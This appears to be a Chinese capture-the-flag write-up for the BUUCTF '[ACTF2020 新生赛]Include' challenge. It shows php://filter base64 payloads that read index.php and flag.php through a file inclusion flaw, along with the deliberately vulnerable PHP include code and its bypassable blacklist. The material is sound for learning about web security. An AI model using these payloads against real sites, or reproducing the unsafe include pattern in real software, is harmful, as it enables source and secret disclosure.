ICode9

精准搜索请尝试: 精确搜索
首页 > 其他分享> 文章详细

Buuctf-Web-[ACTF2020 新生赛]Include

2022-05-13 09:33:27  阅读:277  来源: 互联网

标签:Web ACTF2020 php 读取 base64 filter flag Include payload


前言

刷题网址:https://buuoj.cn/challenges#[ACTF2020 新生赛]Include


首先打开网页,提示tips点击他,根据题目提示很难不想到是文件包含,但是提示是能找到外面的flag吗,如下图。

image

这里我猜想的是否在上上一个目录,../上一个目录,但是无论我输多少都不行。

image

所以这里我转换思路尝试去读取,index.php,发现也不行,所以这里我猜想的是,是不是php伪协议,关于php伪协议的东西可以自行百度查找,这里我使用php://filter读取文件,发现读取成功,这里我读取的是index.php,读取使用的payload如下,是把文件以base64的方式读取,然后我们拿去网址在线解密。

payload: /?file=php://filter/read=convert.base64-encode/resource=index.php

解密代码如下,我们可以清晰的看见,如果file里面有这些php://input,zip://,phar://,data:就会直接退出程序,并且报错hacker

这里没有过滤php://filter所以我们能进来。

<meta charset="utf8">
<?php
error_reporting(0);
$file = $_GET["file"];
if(stristr($file,"php://input") || stristr($file,"zip://") || stristr($file,"phar://") || stristr($file,"data:")){
	exit('hacker!');
}
if($file){
	include($file);
}else{
	echo '<a href="?file=flag.php">tips</a>';
}
?>

既然是这样,我们在尝试读取一下flag.php试试,payload如下。

payload: /?file=php://filter/read=convert.base64-encode/resource=flag.php

然后我们在拿去base64解密,flag就出来了,如下图。

image

标签:Web,ACTF2020,php,读取,base64,filter,flag,Include,payload
来源: https://www.cnblogs.com/takagisan/p/16265403.html

本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享;
2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关;
3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关;
4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除;
5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有